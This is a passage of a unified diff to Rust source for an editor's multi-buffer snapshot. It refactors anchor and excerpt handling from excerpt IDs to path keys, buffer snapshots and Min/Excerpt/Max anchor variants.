pub fn buffer_ids_for_range( &self, range: Range, - ) -> impl Iterator + '_ { - self.excerpts_for_range(range).map(|excerpt| excerpt.id) - } - - pub fn buffer_ids_for_range( - &self, - range: Range, - ) -> impl Iterator + '_ { - self.excerpts_for_range(range) - .map(|excerpt| excerpt.buffer_id) + ) -> impl Iterator + '_ { + self.excerpts_for_range(range) + .map(|excerpt| excerpt.buffer_snapshot(self).remote_id()) } /// Resolves the given [`text::Anchor`]s to [`crate::Anchor`]s if the anchor is within a visible excerpt. @@ -4158,69 +3552,66 @@ impl MultiBufferSnapshot { let anchors = anchors.into_iter(); let mut result = Vec::with_capacity(anchors.size_hint().0); let mut anchors = anchors.peekable(); - let mut cursor = self.excerpts.cursor::>(()); + let mut cursor = self.excerpts.cursor::(()); 'anchors: while let Some(anchor) = anchors.peek() { - let Some(buffer_id) = anchor.buffer_id else { - anchors.next(); - result.push(None); - continue 'anchors; - }; - let mut same_buffer_anchors = - anchors.peeking_take_while(|a| a.buffer_id.is_some_and(|b| buffer_id == b)); + let buffer_id = anchor.buffer_id; + let mut same_buffer_anchors = anchors.peeking_take_while(|a| a.buffer_id == buffer_id); - if let Some(locators) = self.buffer_locators.get(&buffer_id) { + if let Some(buffer) = self.buffers.get(&buffer_id) { + let path = &buffer.path_key; let Some(mut next) = same_buffer_anchors.next() else { continue 'anchors; }; - 'excerpts: for locator in locators.iter() { - if cursor.seek_forward(&Some(locator), Bias::Left) - && let Some(excerpt) = cursor.item() - { - loop { - // anchor is before the first excerpt - if excerpt - .range - .context - .start - .cmp(&next, &excerpt.buffer) - .is_gt() - { - // so we skip it and try the next anchor - result.push(None); - match same_buffer_anchors.next() { - Some(anchor) => next = anchor, - None => continue 'anchors, - } - // anchor is within the excerpt - } else if excerpt - .range - .context - .end - .cmp(&next, &excerpt.buffer) - .is_ge() - { - // record it and all following anchors that are within - result.push(Some(Anchor::in_buffer(excerpt.id, next))); - result.extend( - same_buffer_anchors - .peeking_take_while(|a| { - excerpt - .range - .context - .end - .cmp(a, &excerpt.buffer) - .is_ge() - }) - .map(|a| Some(Anchor::in_buffer(excerpt.id, a))), - ); - match same_buffer_anchors.next() { - Some(anchor) => next = anchor, - None => continue 'anchors, - } - // anchor is after the excerpt, try the next one - } else { - continue 'excerpts; + cursor.seek_forward(path, Bias::Left); + 'excerpts: loop { + let Some(excerpt) = cursor.item() else { + break; + }; + if &excerpt.path_key != path { + break; + } + let buffer_snapshot = excerpt.buffer_snapshot(self); + + loop { + // anchor is before the first excerpt + if excerpt + .range + .context + .start + .cmp(&next, &buffer_snapshot) + .is_gt() + { + // so we skip it and try the next anchor + result.push(None); + match same_buffer_anchors.next() { + Some(anchor) => next = anchor, + None => continue 'anchors, + } + // anchor is within the excerpt + } else if excerpt + .range + .context + .end + .cmp(&next, &buffer_snapshot) + .is_ge() + { + // record it and all following anchors that are within + result.push(Some(Anchor::in_buffer(excerpt.path_key_index, next))); + result.extend( + same_buffer_anchors + .peeking_take_while(|a| { + excerpt.range.context.end.cmp(a, &buffer_snapshot).is_ge() + }) + .map(|a| Some(Anchor::in_buffer(excerpt.path_key_index, a))), + ); + match same_buffer_anchors.next() { + Some(anchor) => next = anchor, + None => continue 'anchors, } + // anchor is after the excerpt, try the next one + } else { + cursor.next(); + continue 'excerpts; } } } @@ -4233,79 +3624,31 @@ impl MultiBufferSnapshot { result } - pub fn ranges_to_buffer_ranges( - &self, - ranges: impl Iterator>, - ) -> impl Iterator, ExcerptId)> { - ranges.flat_map(|range| { - self.range_to_buffer_ranges((Bound::Included(range.start), Bound::Included(range.end))) - .into_iter() - }) - } - - pub fn range_to_buffer_ranges( - &self, - range: R, - ) -> Vec<(&BufferSnapshot, Range, ExcerptId)> - where - R: RangeBounds, - T: ToOffset, - { - self.range_to_buffer_ranges_with_context(range) - .into_iter() - .map(|(buffer, range, id, _context)| (buffer, range, id)) - .collect() - } - - pub fn range_to_buffer_ranges_with_context( + pub fn range_to_buffer_ranges( &self, - range: R, + range: Range, ) -> Vec<( - &BufferSnapshot, + BufferSnapshot, Range, - ExcerptId, - Range, - )> - where - R: RangeBounds, - T: ToOffset, - { - let start = match range.start_bound() { - Bound::Included(start) => start.to_offset(self), - Bound::Excluded(_) => panic!("excluded start bound not supported"), - Bound::Unbounded => MultiBufferOffset::ZERO, - }; - let end_bound = match range.end_bound() { - Bound::Included(end) => Bound::Included(end.to_offset(self)), - Bound::Excluded(end) => Bound::Excluded(end.to_offset(self)), - Bound::Unbounded => Bound::Unbounded, - }; - let bounds = (Bound::Included(start), end_bound); - + ExcerptRange, + )> { let mut cursor = self.cursor::(); + let start = range.start.to_offset(self); + let end = range.end.to_offset(self); cursor.seek(&start); let mut result: Vec<( - &BufferSnapshot, + BufferSnapshot, Range, - ExcerptId, - Range, + ExcerptRange, )> = Vec::new(); while let Some(region) = cursor.region() { - let dominated_by_end_bound = match end_bound { - Bound::Included(end) => region.range.start > end, - Bound::Excluded(end) => region.range.start >= end, - Bound::Unbounded => false, - }; - if dominated_by_end_bound { + if region.range.start >= end { break; } if region.is_main_buffer { let start_overshoot = start.saturating_sub(region.range.start); - let end_offset = match end_bound { - Bound::Included(end) | Bound::Excluded(end) => end, - Bound::Unbounded => region.range.end, - }; + let end_offset = end; let end_overshoot = end_offset.saturating_sub(region.range.start); let start = region .buffer_range @@ -4315,34 +3658,46 @@ impl MultiBufferSnapshot { .buffer_range .end .min(region.buffer_range.start + end_overshoot); - let context = region.excerpt.range.context.clone(); - if let Some(prev) = result.last_mut().filter(|(_, prev_range, excerpt_id, _)| { - *excerpt_id == region.excerpt.id && prev_range.end == start - }) { + let excerpt_range = region.excerpt.range.clone(); + if let Some(prev) = + result + .last_mut() + .filter(|(prev_buffer, prev_range, prev_excerpt)| { + prev_buffer.remote_id() == region.buffer.remote_id() + && prev_range.end == start + && prev_excerpt.context.start == excerpt_range.context.start + }) + { prev.1.end = end; } else { - result.push((region.buffer, start..end, region.excerpt.id, context)); + result.push((region.buffer.clone(), start..end, excerpt_range)); } } cursor.next(); } - if let Some(excerpt) = cursor.excerpt() { - let dominated_by_prev_excerpt = - result.last().is_some_and(|(_, _, id, _)| *id == excerpt.id); - if !dominated_by_prev_excerpt && excerpt.text_summary.len == 0 { - let excerpt_position = self.len(); - if bounds.contains(&excerpt_position) { - let buffer_offset = - BufferOffset(excerpt.range.context.start.to_offset(&excerpt.buffer)); - let context = excerpt.range.context.clone(); - result.push(( - &excerpt.buffer, - buffer_offset..buffer_offset, - excerpt.id, - context, - )); - } + if let Some(excerpt) = cursor.excerpt() + && excerpt.text_summary.len == 0 + && end == self.len() + { + let buffer_snapshot = excerpt.buffer_snapshot(self); + + let buffer_offset = + BufferOffset(excerpt.range.context.start.to_offset(buffer_snapshot)); + let excerpt_range = excerpt.range.clone(); + if result + .last_mut() + .is_none_or(|(prev_buffer, prev_range, prev_excerpt)| { + prev_buffer.remote_id() != buffer_snapshot.remote_id() + || prev_range.end != buffer_offset + || prev_excerpt.context.start != excerpt_range.context.start + }) + { + result.push(( + buffer_snapshot.clone(), + buffer_offset..buffer_offset, + excerpt_range, + )); } } @@ -4352,14 +3707,7 @@ impl MultiBufferSnapshot { pub fn range_to_buffer_ranges_with_deleted_hunks( &self, range: Range, - ) -> impl Iterator< - Item = ( - &BufferSnapshot, - Range, - ExcerptId, - Option, - ), - > + '_ { + ) -> impl Iterator, Option)> + '_ { let start = range.start.to_offset(self); let end = range.end.to_offset(self); @@ -4382,18 +3730,12 @@ impl MultiBufferSnapshot { .end .min(region.buffer_range.start + end_overshoot); - let region_excerpt_id = region.excerpt.id; let deleted_hunk_anchor = if region.is_main_buffer { None } else { Some(self.anchor_before(region.range.start)) }; - let result = ( - region.buffer, - start..end, - region_excerpt_id, - deleted_hunk_anchor, - ); + let result = (region.buffer, start..end, deleted_hunk_anchor); cursor.next(); Some(result) }) @@ -4426,7 +3768,7 @@ impl MultiBufferSnapshot { + AddAssign + Ord, { - let mut current_excerpt_metadata: Option<(ExcerptId, I)> = None; + let mut current_excerpt_metadata: Option<(ExcerptRange, I)> = None; let mut cursor = self.cursor::(); // Find the excerpt and buffer offset where the given range ends. @@ -4441,7 +3783,7 @@ impl MultiBufferSnapshot { ::default() }; buffer_end = buffer_end + overshoot; - range_end = Some((region.excerpt.id, buffer_end)); + range_end = Some((region.excerpt.range.clone(), buffer_end)); break; } cursor.next(); @@ -4466,11 +3808,12 @@ impl MultiBufferSnapshot { iter::from_fn(move || { loop { let excerpt = cursor.excerpt()?; + let buffer_snapshot = excerpt.buffer_snapshot(self); // If we have already retrieved metadata for this excerpt, continue to use it. let metadata_iter = if let Some((_, metadata)) = current_excerpt_metadata .as_mut() - .filter(|(excerpt_id, _)| *excerpt_id == excerpt.id) + .filter(|(excerpt_info, _)| excerpt_info == &excerpt.range) { Some(metadata) } @@ -4493,16 +3836,20 @@ impl MultiBufferSnapshot { .range .context .end - .summary::(&excerpt.buffer); - if let Some((end_excerpt_id, end_buffer_offset)) = range_end - && excerpt.id == end_excerpt_id + .summary::(&buffer_snapshot); + if let Some((end_excerpt, end_buffer_offset)) = &range_end + && &excerpt.range == end_excerpt { - buffer_end = buffer_end.min(end_buffer_offset); + buffer_end = buffer_end.min(*end_buffer_offset); } - get_buffer_metadata(&excerpt.buffer, buffer_start..buffer_end).map(|iterator| { - &mut current_excerpt_metadata.insert((excerpt.id, iterator)).1 - }) + get_buffer_metadata(&buffer_snapshot, buffer_start..buffer_end).map( + |iterator| { + &mut current_excerpt_metadata + .insert((excerpt.range.clone(), iterator)) + .1 + }, + ) }; // Visit each metadata item. @@ -4566,8 +3913,8 @@ impl MultiBufferSnapshot { // When there are no more metadata items for this excerpt, move to the next excerpt. else { current_excerpt_metadata.take(); - if let Some((end_excerpt_id, _)) = range_end - && excerpt.id == end_excerpt_id + if let Some((end_excerpt, _)) = &range_end + && &excerpt.range == end_excerpt { return None; } @@ -4590,14 +3937,16 @@ impl MultiBufferSnapshot { cursor.seek_to_start_of_current_excerpt(); let excerpt = cursor.excerpt()?; - let excerpt_start = excerpt.range.context.start.to_offset(&excerpt.buffer); - let excerpt_end = excerpt.range.context.end.to_offset(&excerpt.buffer); - let current_position = self - .anchor_before(offset) - .text_anchor - .to_offset(&excerpt.buffer); + let buffer = excerpt.buffer_snapshot(self); + let excerpt_start = excerpt.range.context.start.to_offset(buffer); + let excerpt_end = excerpt.range.context.end.to_offset(buffer); + let current_position = match self.anchor_before(offset) { + Anchor::Min => 0, + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor.text_anchor().to_offset(buffer), + Anchor::Max => unreachable!(), + }; - if let Some(diff) = self.diffs.get(&excerpt.buffer_id) { + if let Some(diff) = self.diff_state(excerpt.buffer_id) { if let Some(main_buffer) = &diff.main_buffer { for hunk in diff .hunks_intersecting_base_text_range_rev(excerpt_start..excerpt_end, main_buffer) @@ -4605,24 +3954,22 @@ impl MultiBufferSnapshot { if hunk.diff_base_byte_range.end >= current_position { continue; } - let hunk_start = excerpt.buffer.anchor_after(hunk.diff_base_byte_range.start); - let start = Anchor::in_buffer(excerpt.id, hunk_start).to_point(self); + let hunk_start = buffer.anchor_after(hunk.diff_base_byte_range.start); + let start = + Anchor::in_buffer(excerpt.path_key_index, hunk_start).to_point(self); return Some(MultiBufferRow(start.row)); } } else { - let excerpt_end = excerpt - .buffer - .anchor_before(excerpt_end.min(current_position)); - for hunk in diff.hunks_intersecting_range_rev( - excerpt.range.context.start..excerpt_end, - &excerpt.buffer, - ) { - let hunk_end = hunk.buffer_range.end.to_offset(&excerpt.buffer); + let excerpt_end = buffer.anchor_before(excerpt_end.min(current_position)); + for hunk in diff + .hunks_intersecting_range_rev(excerpt.range.context.start..excerpt_end, buffer) + { + let hunk_end = hunk.buffer_range.end.to_offset(buffer); if hunk_end >= current_position { continue; } - let start = - Anchor::in_buffer(excerpt.id, hunk.buffer_range.start).to_point(self); + let start = Anchor::in_buffer(excerpt.path_key_index, hunk.buffer_range.start) + .to_point(self); return Some(MultiBufferRow(start.row)); } } @@ -4631,38 +3978,40 @@ impl MultiBufferSnapshot { loop { cursor.prev_excerpt(); let excerpt = cursor.excerpt()?; + let buffer = excerpt.buffer_snapshot(self); - let Some(diff) = self.diffs.get(&excerpt.buffer_id) else { + let Some(diff) = self.diff_state(excerpt.buffer_id) else { continue; }; if let Some(main_buffer) = &diff.main_buffer { let Some(hunk) = diff .hunks_intersecting_base_text_range_rev( - excerpt.range.context.to_offset(&excerpt.buffer), + excerpt.range.context.to_offset(buffer), main_buffer, ) .next() else { continue; }; - let hunk_start = excerpt.buffer.anchor_after(hunk.diff_base_byte_range.start); - let start = Anchor::in_buffer(excerpt.id, hunk_start).to_point(self); + let hunk_start = buffer.anchor_after(hunk.diff_base_byte_range.start); + let start = Anchor::in_buffer(excerpt.path_key_index, hunk_start).to_point(self); return Some(MultiBufferRow(start.row)); } else { let Some(hunk) = diff - .hunks_intersecting_range_rev(excerpt.range.context.clone(), &excerpt.buffer) + .hunks_intersecting_range_rev(excerpt.range.context.clone(), buffer) .next() else { continue; }; - let start = Anchor::in_buffer(excerpt.id, hunk.buffer_range.start).to_point(self); + let start = Anchor::in_buffer(excerpt.path_key_index, hunk.buffer_range.start) + .to_point(self); return Some(MultiBufferRow(start.row)); } } } pub fn has_diff_hunks(&self) -> bool { - self.diffs.values().any(|diff| !diff.is_empty()) + self.diffs.iter().any(|diff| !diff.is_empty()) } pub fn is_inside_word( @@ -4730,16 +4079,17 @@ impl MultiBufferSnapshot { .map(|ch| classifier.kind(ch)) } + pub fn all_buffer_ids(&self) -> impl Iterator + '_ { + self.buffers.iter().map(|(id, _)| *id) + } + pub fn is_singleton(&self) -> bool { self.singleton } - pub fn as_singleton(&self) -> Option<(ExcerptId, BufferId, &BufferSnapshot)> { - if self.singleton { - self.excerpts - .iter() - .next() - .map(|e| (e.id, e.buffer_id, &*e.buffer)) + pub fn as_singleton(&self) -> Option<&BufferSnapshot> { + if self.is_singleton() { + Some(self.excerpts.first()?.buffer_snapshot(&self)) } else { None } @@ -4836,11 +4186,11 @@ impl MultiBufferSnapshot { range: MultiBufferOffset::ZERO..MultiBufferOffset::ZERO, excerpts: self.excerpts.cursor(()), diff_transforms: self.diff_transforms.cursor(()), - diffs: &self.diffs, diff_base_chunks: None, excerpt_chunks: None, buffer_chunk: None, language_aware, + snapshot: self, }; let range = range.start.to_offset(self)..range.end.to_offset(self); chunks.seek(range); @@ -4987,7 +4337,7 @@ impl MultiBufferSnapshot { && !region.is_main_buffer { let main_buffer_position = cursor.main_buffer_position()?; - let buffer_snapshot = &cursor.excerpt()?.buffer; + let buffer_snapshot = cursor.excerpt()?.buffer_snapshot(self); return Some((buffer_snapshot, main_buffer_position)); } else if buffer_offset > BufferOffset(region.buffer.len()) { return None; @@ -4995,10 +4345,7 @@ impl MultiBufferSnapshot { Some((region.buffer, buffer_offset)) } - pub fn point_to_buffer_point( - &self, - point: Point, - ) -> Option<(&BufferSnapshot, Point, ExcerptId)> { + pub fn point_to_buffer_point(&self, point: Point) -> Option<(&BufferSnapshot, Point)> { let mut cursor = self.cursor::(); cursor.seek(&point); let region = cursor.region()?; @@ -5009,11 +4356,14 @@ impl MultiBufferSnapshot { && region.has_trailing_newline && !region.is_main_buffer { - return Some((&excerpt.buffer, cursor.main_buffer_position()?, excerpt.id)); + return Some(( + &excerpt.buffer_snapshot(self), + cursor.main_buffer_position()?, + )); } else if buffer_point > region.buffer.max_point() { return None; } - Some((region.buffer, buffer_point, excerpt.id)) + Some((region.buffer, buffer_point)) } pub fn suggested_indents( @@ -5174,6 +4524,11 @@ impl MultiBufferSnapshot { } } + pub fn line_len_utf16(&self, row: MultiBufferRow) -> u32 { + self.clip_point_utf16(Unclipped(PointUtf16::new(row.0, u32::MAX)), Bias::Left) + .column + } + pub fn buffer_line_for_row( &self, row: MultiBufferRow, @@ -5240,7 +4595,8 @@ impl MultiBufferSnapshot { } => { let buffer_start = base_text_byte_range.start + start_overshoot; let mut buffer_end = base_text_byte_range.start + end_overshoot; - let Some(base_text) = self.diffs.get(buffer_id).map(|diff| diff.base_text()) else { + let Some(base_text) = self.diff_state(*buffer_id).map(|diff| diff.base_text()) + else { panic!("{:?} is in non-existent deleted hunk", range.start) }; @@ -5292,7 +4648,8 @@ impl MultiBufferSnapshot { .. } => { let buffer_end = base_text_byte_range.start + overshoot; - let Some(base_text) = self.diffs.get(buffer_id).map(|diff| diff.base_text()) else { + let Some(base_text) = self.diff_state(*buffer_id).map(|diff| diff.base_text()) + else { panic!("{:?} is in non-existent deleted hunk", range.end) }; @@ -5323,21 +4680,20 @@ impl MultiBufferSnapshot { let mut cursor = self.excerpts.cursor::(()); cursor.seek(&range.start, Bias::Right); if let Some(excerpt) = cursor.item() { + let buffer_snapshot = excerpt.buffer_snapshot(self); let mut end_before_newline = cursor.end(); if excerpt.has_trailing_newline { end_before_newline -= 1; } - let excerpt_start = excerpt.range.context.start.to_offset(&excerpt.buffer); + let excerpt_start = excerpt.range.context.start.to_offset(&buffer_snapshot); let start_in_excerpt = excerpt_start + (range.start - *cursor.start()); let end_in_excerpt = excerpt_start + (cmp::min(end_before_newline, range.end) - *cursor.start()); summary.add_text_dim( - &excerpt - .buffer - .text_summary_for_range::( - start_in_excerpt..end_in_excerpt, - ), + &buffer_snapshot.text_summary_for_range::( + start_in_excerpt..end_in_excerpt, + ), ); if range.end > end_before_newline { @@ -5352,16 +4708,15 @@ impl MultiBufferSnapshot { .summary::<_, ExcerptDimension>(&range.end, Bias::Right) .0; if let Some(excerpt) = cursor.item() { + let buffer_snapshot = excerpt.buffer_snapshot(self); range.end = cmp::max(*cursor.start(), range.end); - let excerpt_start = excerpt.range.context.start.to_offset(&excerpt.buffer); + let excerpt_start = excerpt.range.context.start.to_offset(&buffer_snapshot); let end_in_excerpt = excerpt_start + (range.end - *cursor.start()); summary.add_text_dim( - &excerpt - .buffer - .text_summary_for_range::( - excerpt_start..end_in_excerpt, - ), + &buffer_snapshot.text_summary_for_range::( + excerpt_start..end_in_excerpt, + ), ); } } @@ -5379,38 +4734,42 @@ impl MultiBufferSnapshot { + Add, MBD::TextDimension: Sub + Ord, { - let excerpt_id = self.latest_excerpt_id(anchor.excerpt_id); - let locator = self.excerpt_locator_for_id(excerpt_id); - let (start, _, mut item) = self - .excerpts - .find::((), locator, Bias::Left); - let mut start = MBD::from_summary(&start.text); - if item.is_none() && excerpt_id == ExcerptId::max() { - item = self.excerpts.last(); - if let Some(last_summary) = self.excerpts.last_summary() { - start = start - ::from_text_summary(&last_summary.text.into()); + let target = anchor.seek_target(self); + let anchor = match anchor { + Anchor::Min => { + return MBD::default(); } - } + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor, + Anchor::Max => { + return MBD::from_summary(&self.text_summary()); + } + }; + + let (start, _, item) = self + .excerpts + .find::((), &target, Bias::Left); + let start = MBD::from_summary(&start.text); let excerpt_start_position = ExcerptDimension(start); if self.diff_transforms.is_empty() { if let Some(excerpt) = item { - if excerpt.id != excerpt_id && excerpt_id != ExcerptId::max() { + if !excerpt.contains(anchor, self) { return excerpt_start_position.0; } + let buffer_snapshot = excerpt.buffer_snapshot(self); let excerpt_buffer_start = excerpt .range .context .start - .summary::(&excerpt.buffer); + .summary::(&buffer_snapshot); let excerpt_buffer_end = excerpt .range .context .end - .summary::(&excerpt.buffer); + .summary::(&buffer_snapshot); let buffer_summary = anchor - .text_anchor - .summary::(&excerpt.buffer); + .text_anchor() + .summary::(&buffer_snapshot); let summary = cmp::min(excerpt_buffer_end, buffer_summary); let mut position = excerpt_start_position; if summary > excerpt_buffer_start { @@ -5425,48 +4784,47 @@ impl MultiBufferSnapshot { let mut diff_transforms_cursor = self .diff_transforms .cursor::, OutputDimension>>(()); - diff_transforms_cursor.next(); if let Some(excerpt) = item { - if excerpt.id != excerpt_id && excerpt_id != ExcerptId::max() { - return self.resolve_summary_for_min_or_max_anchor( - &Anchor::min(), + if !excerpt.contains(anchor, self) { + diff_transforms_cursor.seek(&excerpt_start_position, Bias::Left); + return self.summary_for_excerpt_position_without_hunks( + Bias::Left, excerpt_start_position, &mut diff_transforms_cursor, ); } + let buffer_snapshot = excerpt.buffer_snapshot(self); let excerpt_buffer_start = excerpt .range .context .start - .summary::(&excerpt.buffer); + .summary::(&buffer_snapshot); let excerpt_buffer_end = excerpt .range .context .end - .summary::(&excerpt.buffer); + .summary::(&buffer_snapshot); let buffer_summary = anchor - .text_anchor - .summary::(&excerpt.buffer); + .text_anchor() + .summary::(&buffer_snapshot); let summary = cmp::min(excerpt_buffer_end, buffer_summary); let mut position = excerpt_start_position; if summary > excerpt_buffer_start { position += summary - excerpt_buffer_start; } - if diff_transforms_cursor.start().0 < position { - diff_transforms_cursor.seek_forward(&position, Bias::Left); - } - self.resolve_summary_for_anchor( - &anchor, + diff_transforms_cursor.seek(&position, Bias::Left); + self.summary_for_anchor_with_excerpt_position( + *anchor, position, &mut diff_transforms_cursor, - &excerpt.buffer, + &buffer_snapshot, ) } else { - diff_transforms_cursor.seek_forward(&excerpt_start_position, Bias::Left); - self.resolve_summary_for_min_or_max_anchor( - &Anchor::max(), + diff_transforms_cursor.seek(&excerpt_start_position, Bias::Left); + self.summary_for_excerpt_position_without_hunks( + Bias::Right, excerpt_start_position, &mut diff_transforms_cursor, ) @@ -5477,9 +4835,9 @@ impl MultiBufferSnapshot { /// Maps an anchor's excerpt-space position to its output-space position by /// walking the diff transforms. The cursor is shared across consecutive /// calls, so it may already be partway through the transform list. - fn resolve_summary_for_anchor( + fn summary_for_anchor_with_excerpt_position( &self, - anchor: &Anchor, + anchor: ExcerptAnchor, excerpt_position: ExcerptDimension, diff_transforms: &mut Cursor< DiffTransform, @@ -5510,9 +4868,9 @@ impl MultiBufferSnapshot { hunk_info, .. }) => { - if let Some(diff_base_anchor) = &anchor.diff_base_anchor + if let Some(diff_base_anchor) = anchor.diff_base_anchor && let Some(base_text) = - self.diffs.get(buffer_id).map(|diff| diff.base_text()) + self.diff_state(*buffer_id).map(|diff| diff.base_text()) && diff_base_anchor.is_valid(&base_text) { // The anchor carries a diff-base position — resolve it @@ -5534,7 +4892,7 @@ impl MultiBufferSnapshot { } } else if at_transform_end && anchor - .text_anchor + .text_anchor() .cmp(&hunk_info.hunk_start_anchor, excerpt_buffer) .is_gt() { @@ -5569,9 +4927,9 @@ impl MultiBufferSnapshot { } /// Like `resolve_summary_for_anchor` but optimized for min/max anchors. - fn resolve_summary_for_min_or_max_anchor( + fn summary_for_excerpt_position_without_hunks( &self, - anchor: &Anchor, + bias: Bias, excerpt_position: ExcerptDimension, diff_transforms: &mut Cursor< DiffTransform, @@ -5588,7 +4946,7 @@ impl MultiBufferSnapshot { // A right-biased anchor at a transform boundary belongs to the // *next* transform, so advance past the current one. - if anchor.text_anchor.bias == Bias::Right && at_transform_end { + if bias == Bias::Right && at_transform_end { diff_transforms.next(); continue; } @@ -5604,27 +4962,27 @@ impl MultiBufferSnapshot { } fn excerpt_offset_for_anchor(&self, anchor: &Anchor) -> ExcerptOffset { - let mut cursor = self - .excerpts - .cursor::, ExcerptOffset>>(()); - let locator = self.excerpt_locator_for_id(anchor.excerpt_id); + let anchor = match anchor { + Anchor::Min => return ExcerptOffset::default(), + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor, + Anchor::Max => return self.excerpts.summary().len(), + }; + let mut cursor = self.excerpts.cursor::(()); + let target = anchor.seek_target(self); - cursor.seek(&Some(locator), Bias::Left); - if cursor.item().is_none() && anchor.excerpt_id == ExcerptId::max() { - cursor.prev(); - } + cursor.seek(&target, Bias::Left); - let mut position = cursor.start().1; + let mut position = cursor.start().len(); if let Some(excerpt) = cursor.item() - && (excerpt.id == anchor.excerpt_id || anchor.excerpt_id == ExcerptId::max()) + && excerpt.contains(anchor, self) { - let excerpt_buffer_start = excerpt - .buffer - .offset_for_anchor(&excerpt.range.context.start); - let excerpt_buffer_end = excerpt.buffer.offset_for_anchor(&excerpt.range.context.end); + let buffer_snapshot = excerpt.buffer_snapshot(self); + let excerpt_buffer_start = + buffer_snapshot.offset_for_anchor(&excerpt.range.context.start); + let excerpt_buffer_end = buffer_snapshot.offset_for_anchor(&excerpt.range.context.end); let buffer_position = cmp::min( excerpt_buffer_end, - excerpt.buffer.offset_for_anchor(&anchor.text_anchor), + buffer_snapshot.offset_for_anchor(&anchor.text_anchor()), ); if buffer_position > excerpt_buffer_start { position += buffer_position - excerpt_buffer_start; @@ -5633,13 +4991,6 @@ impl MultiBufferSnapshot { position } - pub fn latest_excerpt_id(&self, mut excerpt_id: ExcerptId) -> ExcerptId { - while let Some(replacement) = self.replaced_excerpts.get(&excerpt_id) { - excerpt_id = *replacement; - } - excerpt_id - } - pub fn summaries_for_anchors<'a, MBD, I>(&'a self, anchors: I) -> Vec where MBD: MultiBufferDimension @@ -5658,43 +5009,57 @@ impl MultiBufferSnapshot { let mut summaries = Vec::new(); while let Some(anchor) = anchors.peek() { - let excerpt_id = self.latest_excerpt_id(anchor.excerpt_id); - - let excerpt_anchors = anchors.peeking_take_while(|anchor| { - self.latest_excerpt_id(anchor.excerpt_id) == excerpt_id - }); + let target = anchor.seek_target(self); + let excerpt_anchor = match anchor { + Anchor::Min => { + summaries.push(MBD::default()); + anchors.next(); + continue; + } + Anchor::Excerpt(excerpt_anchor) => excerpt_anchor, + Anchor::Max => { + summaries.push(MBD::from_summary(&self.text_summary())); + anchors.next(); + continue; + } + }; - let locator = self.excerpt_locator_for_id(excerpt_id); - cursor.seek_forward(locator, Bias::Left); - if cursor.item().is_none() && excerpt_id == ExcerptId::max() { - cursor.prev(); - } + cursor.seek_forward(&target, Bias::Left); let excerpt_start_position = ExcerptDimension(MBD::from_summary(&cursor.start().text)); if let Some(excerpt) = cursor.item() { - if excerpt.id != excerpt_id && excerpt_id != ExcerptId::max() { - let position = self.resolve_summary_for_min_or_max_anchor( - &Anchor::min(), + let buffer_snapshot = excerpt.buffer_snapshot(self); + if !excerpt.contains(&excerpt_anchor, self) { + diff_transforms_cursor.seek_forward(&excerpt_start_position, Bias::Left); + let position = self.summary_for_excerpt_position_without_hunks( + Bias::Left, excerpt_start_position, &mut diff_transforms_cursor, ); - summaries.extend(excerpt_anchors.map(|_| position)); + summaries.push(position); + anchors.next(); continue; } let excerpt_buffer_start = excerpt .range .context .start - .summary::(&excerpt.buffer); + .summary::(buffer_snapshot); let excerpt_buffer_end = excerpt .range .context .end - .summary::(&excerpt.buffer); - for (buffer_summary, anchor) in excerpt - .buffer + .summary::(buffer_snapshot); + for (buffer_summary, excerpt_anchor) in buffer_snapshot .summaries_for_anchors_with_payload::( - excerpt_anchors.map(|a| (&a.text_anchor, a)), + std::iter::from_fn(|| { + let excerpt_anchor = anchors.peek()?.excerpt_anchor()?; + if !excerpt.contains(&excerpt_anchor, self) { + return None; + } + anchors.next(); + Some((excerpt_anchor.text_anchor(), excerpt_anchor)) + }), ) { let summary = cmp::min(excerpt_buffer_end, buffer_summary); @@ -5707,21 +5072,22 @@ impl MultiBufferSnapshot { diff_transforms_cursor.seek_forward(&position, Bias::Left); } - summaries.push(self.resolve_summary_for_anchor( - anchor, + summaries.push(self.summary_for_anchor_with_excerpt_position( + excerpt_anchor, position, &mut diff_transforms_cursor, - &excerpt.buffer, + &buffer_snapshot, )); } } else { diff_transforms_cursor.seek_forward(&excerpt_start_position, Bias::Left); - let position = self.resolve_summary_for_min_or_max_anchor( - &Anchor::max(), + let position = self.summary_for_excerpt_position_without_hunks( + Bias::Right, excerpt_start_position, &mut diff_transforms_cursor, ); - summaries.extend(excerpt_anchors.map(|_| position)); + summaries.push(position); + anchors.next(); } } @@ -5768,92 +5134,27 @@ impl MultiBufferSnapshot { }) } - pub fn refresh_anchors<'a, I>(&'a self, anchors: I) -> Vec<(usize, Anchor, bool)> - where - I: 'a + IntoIterator, - { - let mut anchors = anchors.into_iter().enumerate().peekable(); - let mut cursor = self.excerpts.cursor::>(()); - cursor.next(); - - let mut result = Vec::new(); - - while let Some((_, anchor)) = anchors.peek() { - let old_excerpt_id = anchor.excerpt_id; - - // Find the location where this anchor's excerpt should be. - let old_locator = self.excerpt_locator_for_id(old_excerpt_id); - cursor.seek_forward(&Some(old_locator), Bias::Left); - - let next_excerpt = cursor.item(); - let prev_excerpt = cursor.prev_item(); - - // Process all of the anchors for this excerpt. - while let Some((anchor_ix, &anchor)) = - anchors.next_if(|(_, anchor)| anchor.excerpt_id == old_excerpt_id) - { - let mut anchor = anchor; - - // Leave min and max anchors unchanged if invalid or - // if the old excerpt still exists at this location - let mut kept_position = next_excerpt - .is_some_and(|e| e.id == old_excerpt_id && e.contains(&anchor)) - || old_excerpt_id == ExcerptId::max() - || old_excerpt_id == ExcerptId::min(); - - // If the old excerpt no longer exists at this location, then attempt to - // find an equivalent position for this anchor in an adjacent excerpt. - if !kept_position { - for excerpt in [next_excerpt, prev_excerpt].iter().filter_map(|e| *e) { - if excerpt.contains(&anchor) { - anchor.excerpt_id = excerpt.id; - kept_position = true; - break; - } - } - } - - // If there's no adjacent excerpt that contains the anchor's position, - // then report that the anchor has lost its position. - if !kept_position { - anchor = if let Some(excerpt) = next_excerpt { - let mut text_anchor = excerpt - .range - .context - .start - .bias(anchor.text_anchor.bias, &excerpt.buffer); - if text_anchor - .cmp(&excerpt.range.context.end, &excerpt.buffer) - .is_gt() - { - text_anchor = excerpt.range.context.end; - } - Anchor::in_buffer(excerpt.id, text_anchor) - } else if let Some(excerpt) = prev_excerpt { - let mut text_anchor = excerpt - .range - .context - .end - .bias(anchor.text_anchor.bias, &excerpt.buffer); - if text_anchor - .cmp(&excerpt.range.context.start, &excerpt.buffer) - .is_lt() - { - text_anchor 